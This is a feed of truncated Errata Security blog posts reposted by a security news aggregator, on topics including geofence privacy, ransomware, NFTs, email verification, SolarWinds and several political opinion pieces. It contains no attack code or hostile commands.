data. In this indictment we see why: before the data was found the purpose was to smear Trump. The finders of the data don't want people to come to the best explanation, they want only explainations that hurt Trump.Trump had no control over the domain in question, trump-email.com. Instead, it was created by a hotel marketing firm they hired, Cendyne. It's Cendyne who put Trump's name in the domain. A broader collection of DNS information including Cendyne's other clients would show whether this was normal or not.In other words, a possible explanation of the data, hints of a Trump-Alfa connection, has always been the dishonesty of those who collected the data. The above indictment confirms they were at this level of dishonesty. It doesn't mean the DNS requests didn't happen, but that their anomalous nature can be created by deletion of explanatory data.Lastly, we see in this indictment the problem with "experts".]]> 2021-09-21T18:01:25+00:00 https://blog.erratasec.com/2021/09/that-alfa-trump-sussman-indictment.html www.secnews.physaphae.fr/article.php?IdArticle=3408689 False Guideline None None Errata Security - Errata Security How not to get caught in law-enforcement geofence requests September 15, 2021 (FWIW, I'm seeking info from people who actually know the answer based on their expertise, not from those who are just guessing, or are who are now googling around to figure out what the answer may be,)- Orin Kerr (@OrinKerr) September 15, 2021 First, let me address the second part of his tweet, whether I'm technically qualified to answer this. I'm not sure, I have only 80% confidence that I am. Hence, I'm writing this answer as blogpost hoping people will correct me if I'm wrong.There is a simple answer and it's this: just disable "Location" tracking in the settings on the phone. Both iPhone and Android have a one-click button to tap that disables everything.The trick is knowing which thing to disable. On the iPhone it's called "Location Services". On the Android, it's simply called "Location".If you do start googling around for answers, you'll find articles upset that Google is still tracking them. That's because they disabled "Location History" and not "Location". This left "Location Services" and "Web and App Activity" still tracking them. Disabling "Location" on the phone disables all these things [*].It's that simple: one click and done, and Google won't be able to report your location in a geofence request.I'm pretty confident in this answer, despite what your googling around will tell you about Google's pernicious ways. But I'm only 80% confident in my answer. Technology is complex and constantly changing.Note that the answer is very different for mobile phone companies, like AT&T or T-Mobile. They have their own ways of knowing about your phone's location independent of whatever Google or Apple do on the phone itself. Because of modern 4G/LTE, cell towers must estimate both your direction and distance from the tower. I've confirmed that they can know your location to within 50 feet. There are limitations to this, it depends upon whether you are simply in range of the tower or have an active phone call in progress. Thus, I think law enforcement prefers asking Google.Another example is how my car uses Google Maps all the time, and doesn't have privacy settings. I don't know what it reports to Google. So when I rob a bank, my phone won't betray me, but my car will.]]> 2021-09-14T23:17:40+00:00 https://blog.erratasec.com/2021/09/how-not-to-get-caught-in-law.html www.secnews.physaphae.fr/article.php?IdArticle=3370426 False None None None Errata Security - Errata Security Of course you can\'t trust scientists on politics July 26, 2021First of all, people trust airplanes because of their long track record of safety, not because of any claims made by scientists. Secondly, people distrust "scientists" when politics is involved because of course scientists are human and can get corrupted by their political (or religious) beliefs.And thirdly, the concept of "trusting scientific authority" is wrong, since the bedrock principle of science is distrusting authority. What defines sciences is how often prevailing scientific beliefs are challenged.Carl Sagan has many quotes along these lines that eloquently expresses this:A central lesson of science is that to understand complex issues (or even simple ones), we must try to free our minds of dogma and to guarantee the freedom to publish, to contradict, and to experiment. Arguments from authority are unacceptable.If you are "arguing from authority", like Paul Graham is doing above, then you are fundamentally misunderstanding both the principles of science and its history.We know where this controversy comes from: politics. The above tweet isn't complaining about the $400 billion U.S. market for alternative medicines, a largely non-political example. It's complaining about political issues like vaccines, global warming, and evolution.The reason those on the right-wing resist these things isn't because they are inherently anti-science, it's because the left-wing is. They left has corrupted and politicized these topics. The "Green New Deal" contains very little that is "Green" and much that is "New Deal", for example. The left goes from the fact "carbon dioxide absorbs infrared" to justify "we need to promote labor unions".Take Marjorie Taylor Green's (MTG) claim that she doesn't believe in the Delta variant because she doesn't believe in evolution. Her argument is laughably stupid, of course, but it starts with the way the left has politicized the term "evolution".The "Delta" variant didn't arise from "evolution", it arose because of "mutation" and "natural selection". We know the "mutation" bit is true, because we can sequence the complete DNA and detect that changes happen. We know that "selection" happens, because we see some variants overtake others in how fast they spread.Yes, "evolution" is synonymous with mutation plus selection, but it's also a politically loaded term that means a lot of additional things. The public doesn't understand mutation and natural-selection, because these concepts are not really taught in school. Schools don't teach students to understand these things, they teach students to believe.The focus of science eduction in school is indoctrinating students into believing in "evolution" rather than teaching the mechanisms of "mutation" and "natural-selection". We see the conflict in things like describing the evolution of the eyeball, which Creationists "reasonably" believe is too complex to have evolved this way. I put "reasonable" in quotes here because it's just the "Gods in the gaps" argument, which credits God for everything that science can't explain, which isn't very smart. But at the same time, science textbooks go too far, refusing to admit their gaps in knowledge here. The fossil records shows a lot of complexity arising over time through steady change -- it just doesn't show anything about eyeballs.In other words, it's]]> 2021-07-26T20:52:15+00:00 https://blog.erratasec.com/2021/07/of-course-you-cant-trust-scientists-on.html www.secnews.physaphae.fr/article.php?IdArticle=3137990 False None None None Errata Security - Errata Security Risk analysis for DEF CON 2021 First, a note about risk analysis. For many people, "risk" means something to avoid. They work in a binary world, labeling things as either "risky" (to be avoided) or "not risky". But real risk analysis is about shades of gray, trying to quantify things.The Delta variant is a mutation out of India that, at the moment, is particularly affecting the UK. Cases are nearly up to their pre-vaccination peaks in that country.Note that the UK has already vaccinated nearly 70% of their population -- more than the United States. In both the UK and US there are few preventive measures in place (no lockdowns, no masks) other than vaccines. Thus, the UK graph is somewhat predictive of what will happen in the United States. If we time things from when the latest wave hit the same levels as peak of the first wave, then it looks like the USA is only about 1.5 months behind the UK.It's another interesting lesson about risk analysis. Most people experience these things as sudden changes. One moment, everything seems fine, and cases are decreasing. The next moment, we are experiencing a major new wave of infections. It's especially jarring when the thing we are tracking is exponential. But we can compare the curves and see that things are totally predictable. In about another 1.5 months, the US will experience a wave that looks similar to the UK wave.Sometimes the problem is that the change is inconceivable. We saw that recently with 1-in-100 year floods in Germany. Weather forecasters predicted 1-in-100 level of floods days in advance, but they still surprised many people.]]> 2021-07-21T18:11:58+00:00 https://blog.erratasec.com/2021/07/risk-analysis-for-def-con-2021.html www.secnews.physaphae.fr/article.php?IdArticle=3108408 False None None None Errata Security - Errata Security Ransomware: Quis custodiet ipsos custodes human-operated ransomware killchain, identify how they typically achieve "administrator" credentials, and fix those problems. In particular, large organizations need to redesign how they handle Windows "domains" and "segment" networks.I read a lot of lazy op-eds on ransomware. Most of them claim that the problem is due to some sort of moral weakness (laziness, stupidity, greed, slovenliness, lust). They suggest things like "taking cybersecurity more seriously" or "do better at basic cyber hygiene". These are "unfalsifiable" -- things that nobody would disagree with, meaning they are things the speaker doesn't really have to defend. They don't rest upon technical authority but moral authority: anybody, regardless of technical qualifications, can have an opinion on ransomware as long as they phrase it in such terms.Another flaw of these "unfalsifiable" solutions is that they are not measurable. There's no standard definition for "best practices" or "basic cyber hygiene", so there no way to tell if you aren't already doing such things, or the gap you need to overcome to reach this standard. Worse, some people point to the "NIST Cybersecurity Framework" as the "basics" -- but that's a framework for all cybersecurity practices. In other words, anything short of doing everything possible is considered a failure to follow the basics.In this post, I try to focus on specifics, while at the same time, making sure things are broadly applicable. It's detailed enough that people will disagree with my solutions.The thesis of this blogpost is that we are failing to protect "administrative" accounts. The big ransomware attacks happen because the hackers got administrative control over the network, usually the Windows domain admin. It's with administrative control that they are able to cause such devastation, able to reach all the files in the network, while also being able to delete backups.The Kaseya attacks highlight this particularly well. The company produces a product that is in turn used by "Managed Security Providers" (MSPs) to administer the security of small and medium sized businesses. Hackers found and exploited a vulnerability in the product, which gave them administrative control of over 1000 small and medium sized businesses around the world.The underlying problems start with the way their software gives indiscriminate administrative access over computers. Then, this software was written using standard software techniques, meaning, with the standard vulnerabilities that most software has (such as "SQL injection"). It wasn't written in a paranoid, careful way that you'd hope for software that poses this much danger.A good analogy is airplanes. A common joke refers to the "black box" flight-recorders that survive airplane crashes, that maybe we should make the entire airplane out of that material. The reason we can't do this is that airplanes would be too heavy to fly. The same is true of software: airplane software is written with extreme paranoia knowing that bugs can l]]> 2021-07-14T20:49:05+00:00 https://blog.erratasec.com/2021/07/ransomware-quis-custodiet-ipsos-custodes.html www.secnews.physaphae.fr/article.php?IdArticle=3067990 False Ransomware,Vulnerability,Guideline None None Errata Security - Errata Security Some quick notes on SDR There are two panes. The top shows the current signal strength as graph. The bottom pane is the "waterfall" graph showing signal strength over time, display strength as colors: black means almost no signal, blue means some, and yellow means a strong signal.The signal strength graph is a bowl shape, because we are actually sampling at a specific frequency of 2.42 GHz, and the further away from this "center", the less accurate the analysis. Thus, the algorithms think there is more signal the further away from the center we are.What we do see here is two peaks, at 2.402 GHz toward the left and 2.426 GHz toward the right (which I've marked with the red line). These are the "Bluetooth beacon" channels. I was able to capture the screen at the moment some packets were sent, showing signal at this point. Below in the waterfall chart, we see packets constantly being sent at these frequencies.We are surrounded by devices giving off packets here: our phones, our watches, "tags" attached to devices, televisions, remote controls, speakers, computers, and so on. This is a picture from my home, showing only my devices and perhaps my neighbors. In a crowded area, these two bands are saturated with traffic.The 2.4 GHz region also includes WiFi. So I connected to a WiFi access-point to watch the signal.WiFi uses more bandwidth than Bluetooth. The term "bandwidth" is used today to mean "faster speeds", but it comes from the world of radio where it quite literally means the width of the band. The width of the Bluetooth transmissions seen above is 2 MHz, the width of the WiFi band shown here is 20 MHz.It took about 50 screenshots before getting these two. I had to hit the "capture" button right at the moment things were being transmitted. And easier way is a setting that graphs the current signal strength compared to the maximum recently seen as a separate line. That's shown below: the instant it was taken, there was no signal, but it shows the maximum of recent signals as a separate line:]]> 2021-07-05T17:15:28+00:00 https://blog.erratasec.com/2021/07/some-quick-notes-on-sdr.html www.secnews.physaphae.fr/article.php?IdArticle=3025400 False None None None Errata Security - Errata Security When we\'ll get a 128-bit CPU You won't live to see a 128-bit CPU" is trending". Sadly, it was non-technical, so didn't really contain anything useful. I thought I'd write up some technical notes.The issue isn't the CPU, but memory. It's not about the size of computations, but when CPUs will need more than 64-bits to address all the memory future computers will have. It's a simple question of math and Moore's Law.Today, Intel's server CPUs support 48-bit addresses, which is enough to address 256-terabytes of memory -- in theory. In practice, Amazon's AWS cloud servers are offered up to 24-terabytes, or 45-bit addresses, in the year 2020.Doing the math, it means we have 19-bits or 38-years left before we exceed the 64-bit registers in modern processors. This means that by the year 2058, we'll exceed the current address size and need to move 128-bits. Most people reading this blogpost will be alive to see that, though probably retired.There are lots of reasons to suspect that this event will come both sooner and later.It could come sooner if storage merges with memory. We are moving away from rotating platters of rust toward solid-state storage like flash. There are post-flash technologies like Intel's Optane that promise storage that can be accessed at speeds close to that of memory. We already have machines needing petabytes (at least 50-bits worth) of storage.Addresses often contain more just the memory address, but also some sort of description about the memory. For many applications, 56-bits is the maximum, as they use the remaining 8-bits for tags.Combining those two points, we may be only 12 years away from people starting to argue for 128-bit registers in the CPU.Or, it could come later because few applications need more than 64-bits, other than databases and file-systems.Previous transitions were delayed for this reason, as the x86 history shows. The first Intel CPUs were 16-bits addressing 20-bits of memory, and the Pentium Pro was 32-bits addressing 36-bits worth of memory.The few applications that needed the extra memory could deal with the pain of needing to use multiple numbers for addressing. Databases used Intel's address extensions, almost nobody else did. It took 20 years, from the initial release of MIPS R4000 in 1990 to Intel's average desktop processor shipped in 2010 for mainstream apps needing larger addresses.For the transition beyond 64-bits, it'll likely take even longer, and might never happen. Working with large datasets needing more than 64-bit addresses will be such a specialized discipline that it'll happen behind libraries or operating-systems anyway.So let's look at the internal cost of larger registers, if we expand registers to hold larger addresses.We already have 512-bit CPUs -- with registers that large. My laptop uses one. It supports AVX-512, a form of "SIMD" that packs multiple small numbers in one big register, so that he can perform identical computations on many numbers at once, in parallel, rather than sequentially. Indeed, even very low-end processors have been 128-bit for a long time -- for "SIMD".In other words, we can have a large register file with wide registers, and handle the bandwidth of shipping those registers around the CPU performing computations on them. Today's processors already handle this for certain types of computations.But just because we can do many 64-bit computations at once ("SIMD") still doesn't mean we can do a 128-bit computation ("scalar"). Simple problems like "carry" get difficult as numbers get larger. Just because SIMD can do multiple small computations doesn't tell us what one large computation will cost. This was why it took an extra decade for Intel to make the transition -- they added 64-bit MMX registers for SIMD a decade before they added 64-bit for normal computations.The abo]]> 2021-06-20T20:34:42+00:00 https://blog.erratasec.com/2021/06/when-well-get-128-bit-cpu.html www.secnews.physaphae.fr/article.php?IdArticle=2957418 False None None None Errata Security - Errata Security Anatomy of how you get pwned This is obviously a trick. But from where? How did it "get on the machine"?There's lots of possible answers. But the most obvious answer (to most people), that your machine is infected with a virus, is likely wrong. Viruses are generally silent, doing evil things in the background. When you see something like this, you aren't infected ... yet.Instead, things popping with warnings is almost entirely due to evil websites. But that's confusing, since this popup doesn't appear within a web page. It's off to one side of the screen, nowhere near the web browser.Moreover, we spent some time diagnosing this. We restarted the webbrowser in "troubleshooting mode" with all extensions disabled and went to a clean website like Twitter. The popup still kept happening.As it turns out, he had another windows with Firefox running under a different profile. So while he cleaned out everything in this one profile, he wasn't aware the other one was still runningThis happens a lot in investigations. We first rule out the obvious things, and then struggle to find the less obvious explanation -- when it was the obvious thing all along.In this case, the reason the popup wasn't attached to a browser window is because it's a new type of popup notification that's suppose to act more like an app and less like a web page. It has a hidden web page underneath called a "service worker", so the popups keep happening when you think the webpage is closed.Once we figured the mistake of the other Firefox profile, we quickly tracked this down and saw that indeed, it was in the Notification list with Permissions set to Allow. Simply changing this solved the problem.Note that the above picture of the popup has a little wheel in the lower right. We are taught not to click on dangerous thing, so the user in this case was avoiding it. However, had the user clicked on it, it wouldn't led him straight here to the solution. Though, I can't recommend you click on such a thing and trust it, because that means in the future, malicious tricks will contain such safe looking icons that aren't so safe.Anyway, the next question is: which website did this come from?The answer is Google.In the news today was the story of the Michigan guys who tried to kidnap the governor. The user googled "attempted kidnap sentencing guidelines". This search produced a pa]]> 2021-04-29T04:15:50+00:00 https://blog.erratasec.com/2021/04/anatomy-of-how-you-get-pwned.html www.secnews.physaphae.fr/article.php?IdArticle=2713131 False Guideline None None Errata Security - Errata Security Ethics: University of Minnesota\'s hostile patches their paper is useful. I would not be able to immediately recognize their patches as adding a vulnerability -- and I'm an expert at such things.In addition, the sorts of bugs it exploits shows a way forward in the evolution of programming languages. It's not clear that a "safe" language like Rust would be the answer. Linux kernel programming requires tracking resources in ways that Rust would consider inherently "unsafe". Instead, the C language needs to evolve with better safety features and better static analysis. Specifically, we need to be able to annotate the parameters and return statements from functions. For example, if a pointer can't be NULL, then it needs to be documented as a non-nullable pointer. (Imagine if pointers could be signed and unsigned, meaning, can sometimes be NULL or never be NULL).So I'm glad this paper exists. As a researcher, I'll likely cite it in the future. As a programmer, I'll be more vigilant in the future. In my own open-source projects, I should probably review some previous pull requests that I've accepted, since many of them have been the same crappy quality of simply adding a (probably) unnecessary NULL-pointer check.The next question is whether this is ethical. Well, the paper claims to have sign-off from their university's IRB -- their Institutional Review Board that reviews the ethics of experiments. Universities created IRBs to deal with the fact that many medical experiments were done on either unwilling or unwitting subjects, such as the Tuskegee Syphilis Study. All medical research must have IRB sign-off these days.However, I think IRB sign-off for computer security research is stupid. Things like masscanning of the entire Internet are undecidable with traditional ethics. I regularly scan every device on the IPv4 Internet, including your own home router. If you paid attention to the packets your firewall drops, some of them would be from me. Some consider this a gross violation of basic ethics and get very upset that I'm scanning their computer. Others consider this to be the expected consequence of the end-to-end nature of the public Internet, that there's an inherent social contract that you must be prepared to receive any packet from anywhere. Kerckhoff's Principle from the 1800s suggests that core ethic of cybersecurity is exposure to such things rather than trying to cover them up.The point isn't to argue whether masscanning is ethical. The point is to argue that it's undecided, and that your IRB isn't going to be able to answer the question better than anybody else.But here's the thing about masscanning: I'm honest and transparent about it. My very first scan of the entire Internet came with a tweet "BTW, this is me scanning the entire Internet".A lot of ethical questions in other fields comes down to honesty. If you have to lie about it or cover it up, then th]]> 2021-04-21T17:27:21+00:00 https://blog.erratasec.com/2021/04/ethics-university-of-minnesotas-hostile.html www.secnews.physaphae.fr/article.php?IdArticle=2675984 False Hack,Vulnerability None None Errata Security - Errata Security A quick FAQ about NFTs 0x2a46f2ffd99e19a89476e2f62270e0a35bbf0756 - #40913 (Beeple $69m)0xb47e3cd837dDF8e4c57F05d70Ab865de6e193BBB  #7804 ($7.6m CryptoPunks)0x9fc4e38da3a5f7d4950e396732ae10c3f0a54886 - #1 (AP $180k)0x06012c8cf97BEaD5deAe237070F9587f8E7A266d - #896775 ($170k CryptoKitty)With these two numbers, you can go find the token on the blockchain, and read the code to determine what the token contains, how it's traded, its current owner, and so on.#2 How do NFTs contain artwork? or, where is artwork contained?Tokens can't*** contain artwork -- art is too big to fit on the blockchain. That Beeple piece is 300-megabytes in size. Therefore, tokens point to artwork that is located somewhere else than the blockchain.*** (footnote) This isn't actually true. It's just that it's very expensive to put artwork on the blockchain. That Beeple artwork would cost about $5million to put onto the blockchain. Yes, this less than a tenth the purchase price of $69million, but when you account for all the artwork for which people have created NFTs, the total exceeds the prices for all NFTs.So if artwork isn't on the blockchain, where is it located? and how do the NFTs link to it?Our four examples of NFT mentioned above show four different answers to this question. Some are smart, others are stupid -- and by "stupid" I mean "tantamount to fraud".The correct way to link a token with a piece of digital art is through a hash, which can be used with th]]> 2021-03-26T14:51:59+00:00 https://blog.erratasec.com/2021/03/a-quick-faq-about-nfts.html www.secnews.physaphae.fr/article.php?IdArticle=2538944 False None None None Errata Security - Errata Security Deconstructing that $69million NFT Beeple created a piece of art in a fileHe created a hash that uniquely, and unhackably, identified that fileHe created a metadata file that included the hash to the artworkHe created a hash to the metadata fileHe uploaded both files (metadata and artwork) to the IPFS darknet decentralized file sharing serviceHe created, or minted a token governed by the MakersTokenV2 smart contract on the Ethereum blockchainChristies created an auction for this tokenThe auction was concluded with a payment of $69 million worth of Ether cryptocurrency. However, nobody has been able to find this payment on the Ethereum blockchain, the money was probably transferred through some private means.Beeple transferred the token to the winner, who transferred it again to this final Metakovan accountEach of the link above allows you to drill down to exactly what's happening on the blockchain. The rest of this post discusses things in long form.Why do I care?Well, you don't. It makes you feel stupid that you haven't heard about it, when everyone is suddenly talking about it as if it's been a thing for a long time. But the reality, they didn't know what it was a month ago, either. Here is the Google Trends graph to prove this point -- interest has only exploded in the last couple months:The same applies to me. I've been aware of them (since the CryptoKitties craze from a couple years ago) but haven't invested time reading source code until now. Much of this blogpost is written as notes as I discover for myself exactly what was purchased fo]]> 2021-03-20T23:52:47+00:00 https://blog.erratasec.com/2021/03/deconstructing-that-69million-nft.html www.secnews.physaphae.fr/article.php?IdArticle=2511961 False Tool,Guideline None None Errata Security - Errata Security We are living in 1984 (ETERNALBLUE) Baltimore ransomware attack. When the attack happened, the entire cybersecurity community agreed that EternalBlue wasn't responsible.But this New York Times article said otherwise, blaming the Baltimore attack on EternalBlue. And there are hundreds of other news articles [eg] that agree, citing the New York Times. There are no news articles that dispute this.In a recent book, the author of that article admits it's not true, that EternalBlue didn't cause the ransomware to spread. But they defend themselves as it being essentially true, that EternalBlue is responsible for a lot of bad things, even if technically, not in this case. Such errors are justified, on the grounds they are generalizations and simplifications needed for the mass audience.So we are left with the situation Orwell describes: all records tell the same tale -- when the lie passes into history, it becomes the truth.Orwell continues:He wondered, as he had many times wondered before, whether he himself was a lunatic. Perhaps a lunatic was simply a minority of one. At one time it had been a sign of madness to believe that the earth goes round the sun; today, to believe that the past is inalterable. He might be ALONE in holding that belief, and if alone, then a lunatic. But the thought of being a lunatic did not greatly trouble him: the horror was that he might also be wrong.I'm definitely a lunatic, alone in my beliefs. I sure hope I'm not wrong.
Update: Other lunatics document their struggles with Minitrue: When I was investigating the TJX breach, there were NYT articles citing unnamed sources that were made up & then outlets would publish citing the NYT. The TJX lawyers would require us to disprove the articles. Each time we would. It was maddening fighting lies for 8 months.— Nicholas J. Percoco (@c7five) March 1, 2021 ]]>
2021-02-28T20:05:19+00:00 https://blog.erratasec.com/2021/02/we-are-living-in-1984-eternalblue.html www.secnews.physaphae.fr/article.php?IdArticle=2414565 False Ransomware APT 32,NotPetya,Wannacry None
Errata Security - Errata Security Review: Perlroth\'s book on the cyberarms market I'm not sure what the book intends to be. The blurbs from the publisher implies a work of investigative journalism, in which case it's full of unforgivable factual errors. However, it reads more like a memoir, in which case errors are to be expected/forgivable, with content often from memory rather than rigorously fact checked notes.But even with this more lenient interpretation, there are important flaws that should be pointed out. For example, the book claims the Saudi's hacked Bezos with a zero-day. I claim that's bunk. The book claims zero-days are “God mode” compared to other hacking techniques, I claim they are no better than the alternatives, usually worse, and rarely used.]]> 2021-02-27T00:03:27+00:00 https://blog.erratasec.com/2021/02/review-perlroths-book-on-cyberarms.html www.secnews.physaphae.fr/article.php?IdArticle=2407479 False Ransomware,Guideline None None Errata Security - Errata Security No, 1,000 engineers were not needed for SolarWinds SolarWinds hacker attacks. This means in reality that it was probably fewer than 100 skilled engineers. I base this claim on the following Tweet: When asked why they think it was 1,000 devs, Brad Smith says they saw an elaborate and persistent set of work. Made an estimate of how much work went into each of these attacks, and asked their own engineers. 1,000 was their estimate.— Joseph Cox (@josephfcox) February 23, 2021 Yes, it would take Microsoft 1,000 engineers to replicate the attacks. But it takes a large company like Microsoft 10-times the effort to replicate anything. This is partly because Microsoft is a big, stodgy corporation. But this is mostly because this is a fundamental property of software engineering, where replicating something takes 10-times the effort of creating the original thing.It's like painting. The effort to produce a work is often less than the effort to reproduce it. I can throw some random paint strokes on canvas with almost no effort. It would take you an immense amount of work to replicate those same strokes -- even to figure out the exact color of paint that I randomly mixed together.Software EngineeringThe process of software engineering is about creating software that meets a certain set of requirements, or a specification. It is an extremely costly process verify the specification is correct. It's like if you build a bridge but forget a piece and the entire bridge collapses.But code slinging by hackers and open-source programmers works differently. They aren't building toward a spec. They are building whatever they can and whatever they want. It takes a tenth, or even a hundredth of the effort of software engineering. Yes, it usually builds things that few people (other than the original programmer) want to use. But sometimes it produces gems that lots of people use.Take my most popular code slinging effort, masscan. I spent about 6-months of total effort writing it at this point. But if you run code analysis tools on it, they'll tell you that it would take several millions of dollars to replicate the amount of code I've written. And that's just measuring the bulk code, not the numerous clever capabilities and innovations in the code.According to these metrics, I'm either a 100x engineer (a hundred times better than the average engineer) or my claim is true that "code slinging" is a fraction of the effort of "software engineering".The same is true of everything the SolarWinds hackers produced. They didn't have to software engineer code according to Microsoft's processes. They only had to sling code to satisfy their own needs. They don't have to train/hire engineers with the skills necessary to meet a specification, they can write the specification according to what their own engineers can produce. They can do whatever they want with the code because they don't have to satisfy somebody else's needs.HackingSomething is similarly true with hacking. Hacking a specific target, a specific way, is very hard. Hacking any target, any way, is easy.Like most well-known hackers, I regularly get those emails asking me to hack somebody's Facebook account. This is very hard. I can try a lot of things, and in the end, chances are I cannot succeed. On the other hand, if you ask me to hack anybody's Facebook account, I can do that in seconds. I can download one of the many ha]]> 2021-02-25T20:31:46+00:00 https://blog.erratasec.com/2021/02/no-1000-engineers-were-not-needed-for.html www.secnews.physaphae.fr/article.php?IdArticle=2401343 False Hack None None Errata Security - Errata Security The deal with DMCA 1201 reform 2020-12-09T15:25:45+00:00 https://blog.erratasec.com/2020/12/the-deal-with-dmca-1201-reform.html www.secnews.physaphae.fr/article.php?IdArticle=2087760 False Guideline None None Errata Security - Errata Security Why Biden: Principle over Party liberal democracy".Sport matches can be enjoyable even if you don't understand the rules. The same is true of liberal democracy: there's little civic education in the country so most don't know the rules game. Most are unaware even that there are rules.You see that in action with this concern over Trump conceding the election, his unwillingness to commit to a "peaceful transfer of power". His supporters widely believed this is a made-up controversy, a "principle" created on the spot as just another way to criticize Trump.But it's not a new principle. A "peaceful transfer of power" is the #1 bedrock principles from which everything else derives. It's the first way we measure whether a country is actually the "liberal democracy" that they claim. For example, the fact that Putin has been in power for 20 years makes us doubt that they are really the "liberal democracy" that they claim. The reason you haven't heard of it, the reason it isn't discussed much, is that it's so unthinkable that a politician would reject it the way Trump has.The historic importance of this principle can be seen when you go back and read the concession speeches of HillaryMcCainGore, and Bush Sr., and Carter, you see that all of them stressed the legitimacy of their opponent's win, and a commitment to a peaceful transfer of power. (It goes back further than that, to the founding of our country, but I can't link every speech). The following quote from Hillary's concession to Trump demonstrates this principle:But I still believe in America and I always will. And if you do, then we must accept this result and then look to the future. Donald Trump is going to be our president. We owe him an open mind and the chance to lead.Our constitutional democracy enshrines the peaceful transfer of power and we don't just respect that, we cherish it. It also enshrines other things; the rule of law, the principle that we are all equal in rights and dignity, freedom of worship and expression. We respect and cherish these values too and we must defend them.If this were Trump's only failure, then we could excuse it and work around it. As long as he defended all ]]> 2020-10-25T21:05:55+00:00 https://blog.erratasec.com/2020/10/why-biden-principle-over-party.html www.secnews.physaphae.fr/article.php?IdArticle=1996112 False Guideline None None Errata Security - Errata Security No, that\'s not how warrantee expiration works NYPost Hunter Biden story has triggered a lot of sleuths obsessing on technical details trying to prove it's a hoax. So far, these claims are wrong. The story is certainly bad journalism aiming to misinform readers, but it has not yet been shown to be a hoax.In this post, we look at claim the timelines don't match up with the manufacturing dates of the drives. Sleuths claim to prove the drives were manufactured after the events in question, based on serial numbers.What this post will show is that the theory is wrong. Manufacturers pad warrantee periods. Thus, you can't assume a date of manufacture based upon the end of a warrantee period.The story starts with Hunter Biden (or associates) dropping off a laptop at a repair shop because of water damage. The repair shop made a copy of the laptop's hard drive, stored on an external drive. Later, the FBI swooped in and confiscated both the laptop and that external drive.The serial numbers of both devices are listed in the subpoena published by the NYPost:You can enter these serial numbers in the support pages at Apple (FVFXC2MMHV29) and Western Digital (WX21A19ATFF3) to discover precisely what hardware this is, and when the warrantee periods expire -- and presumably, when they started.In the case of that external drive, the 3-year warrantee expires May 17, 2022 -- meaning the drive was manufactured on May 17, 2019 (or so they claim). This is a full month after the claimed date of April 12, 2019, when the laptop was dropped off at the repair shop.There are lots of explanations for this. One of which is that the drive subpoenaed by the government (on Dec 9, 2019) was a copy of the original drive.But a simpler explanation is this: warrant periods are padded by the manufacturer by several months. In other words, if the warrantee ends May 17, it means the drive was probably manufactured in February.I can prove this. Coincidentally, I purchased a Western Digital drive a few days ago. If we used the same logic as above to work backward from warrantee expiration, then it means the drive was manufactured 7 days in the future.Here is a screenshot from Amazon.com showing I purchased the drive Oct 12.]]> 2020-10-16T22:59:01+00:00 https://blog.erratasec.com/2020/10/no-thats-not-how-warrantee-expiration.html www.secnews.physaphae.fr/article.php?IdArticle=1981495 False None None None Errata Security - Errata Security No, font errors mean nothing in that NYPost article article on Hunter Biden emails. Critics claim that these don't look like emails, and that there are errors with the fonts, thus showing they are forgeries. This is false. This is how Apple's "Mail" app prints emails to a PDF file. The font errors are due to viewing PDF files within a web browser -- you don't see them in a PDF app.In this blogpost, I prove this.I'm going to do this by creating forged email. The point isn't to prove the email wasn't forged, it could easily have been -- the NYPost didn't do due diligence to prove they weren't forged. The point is simply that that these inexplicable problems aren't evidence of forgery. All emails printed by the Mail app to a PDF, then displayed with Scribd, will look the same way.To start with, we are going to create a simple text file on the computer called "erratarob-conspire.eml". That's what email messages are at the core -- text files. I use Apple's "TextEdit" app on my MacBook to create the file.The structure of an email is simple. It has a block of "metadata" consisting of fields separated by a colon ":" character. This block ends with a blank line, after which we have the contents of the email.Clicking on the file launches Apple's "Mail" app. It opens the email and renders it on the screen like this:Notice how the "Mail" app has reformatted the metadata. In addition to displaying the email, it's making it simple to click on the names to add them to your address book. That's why there is a (VP) to the right on the screen -- it creates a placeholder icon for every account in your address book.One thing I can do with emails is to save them as a PDF document.This creates a PDF file on the disk that we can view like any other PDF file. Note that yet again, the app has reformatted the metadata, different from both how it displayed it on the screen and how it appears in the original email text.]]> 2020-10-16T17:45:28+00:00 https://blog.erratasec.com/2020/10/no-font-errors-mean-nothing-in-that.html www.secnews.physaphae.fr/article.php?IdArticle=1981263 False None None None Errata Security - Errata Security Yes, we can validate leaked emails leak of emails of Hunter Biden. It has a definitive answer.Today's emails have "cryptographic signatures" inside the metadata. Such signatures have been common for the past decade as one way of controlling spam, to verify the sender is who they claim to be. These signatures verify not only the sender, but also that the contents have not been altered. In other words, it authenticates the document, who sent it, and when it was sent.Crypto works. The only way to bypass these signatures is to hack into the servers. In other words, when we see a 6 year old message with a valid Gmail signature, we know either (a) it's valid or (b) they hacked into Gmail to steal the signing key. Since (b) is extremely unlikely, and if they could hack Google, they could a ton more important stuff with the information, we have to assume (a).Your email client normally hides this metadata from you, because it's boring and humans rarely want to see it. But it's still there in the original email document. An email message is simply a text document consisting of metadata followed by the message contents.It takes no special skills to see metadata. If the person has enough skill to export the email to a PDF document, they have enough skill to export the email source. If they can upload the PDF to Scribd (as in the story), they can upload the email source. I show how to below.To show how this works, I send an email using Gmail to my private email server (from gmail.com to robertgraham.com).The NYPost story shows the email printed as a PDF document. Thus, I do the same thing when the email arrives on my MacBook, using the Apple "Mail" app. It looks like the following:The "raw" form originally sent from my Gmail account is simply a text document that looked like the following:This is rather simple. Client's insert details like a "Message-ID" that humans don't care about. There's also internal formatting details, like the fact that this is a "plain text" message rather than an "HTML" email.But this raw document was the one sent by the Gmail web client. It then passed through Gmail's servers, then was passed across the Internet to my private server, where I finally retrieved it using my MacBook.As email messages pass through servers, the servers add their own metadata.When it arrived, the "raw" document looked like the following. None of the important bits changed, but a lot more metadata was added:]]> 2020-10-14T19:34:25+00:00 https://blog.erratasec.com/2020/10/yes-we-can-validate-leaked-emails.html www.secnews.physaphae.fr/article.php?IdArticle=1977511 False Hack,Guideline None None Errata Security - Errata Security Factcheck: Regeneron\'s use of embryonic stem cells deliberately misinterpreted events to conclude there was still an ethical paradox. I've read the scientific papers and it seems like this is an issue that can be understood with basic high-school science, so I thought I'd write up a detailed discussion.The short answer is this:The drug is not manufactured in any way from human embryonic tissues.The drug was tested using fetal/embryonic cells, but ones almost 50 years old, not new ones.Republicans want to stop using new embryos, the ethical issue here is the continued use of old embryos, which Republican have consistently agreed to.Yes, the drug is still tainted by the "embryonic stem cell" issue -- just not in any of the ways that people claim it is, and not in a way that makes Republicans inconsistent.Almost all medical advances of the last few decades are similarly tainted.Now let's do the long, complicated answer. This starts with a discussion of the science of Regeneron's REG-COV2 treatment.A well-known treatment that goes back decades is to 